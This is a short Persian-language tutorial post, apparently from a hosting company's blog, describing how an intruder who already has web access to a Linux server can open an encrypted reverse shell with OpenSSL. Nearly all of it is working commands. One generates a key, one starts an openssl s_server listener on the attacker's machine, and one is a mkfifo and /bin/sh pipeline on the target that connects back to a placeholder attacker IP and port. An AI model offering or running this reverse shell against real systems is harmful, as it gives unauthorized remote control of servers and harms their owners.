شل معکوس با استفاده از OpenSSL

یکی از دسترسی هایی که نفوذگر بعد از دسترسی به سرور از طریق وب یا … نیاز دارد ، دسترسی به Shell است .

بدین طریق میتوان از ابزار openssl که بر روی سرور های لینوکسی به طور پیشفرض نصب است استفاده کنید

پس ابتدا کلید را میسازیم :

 

[email protected]# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

 

حال اقدام به Listen میکنیم ( روی ماشین نفوذگر )  :

openssl s_server -quiet -key key.pem -cert cert.pem -port <PORT>

 

در آخر از طریق سرور مقصد برای اتصال بصورت معکوس به ماشین اقدام میکنیم :

 

[email protected]#: mkfifo /tmp/s; /bin/sh
-i < /tmp/s 2>&1 | openssl s_client -quiet -connect
<ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/s

 

مشاهده بیشتر

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

بستن
عضویت در خبرنامه
با عضویت در خبرنامه مارال هاست از آخرین مطالب آموزشی ، جدید ترین محصولات و همچنین از تخفیف های ویژه خرید محصول در مارال هاست بهرمند شوید.
عضویت
رفتن به نوار ابزار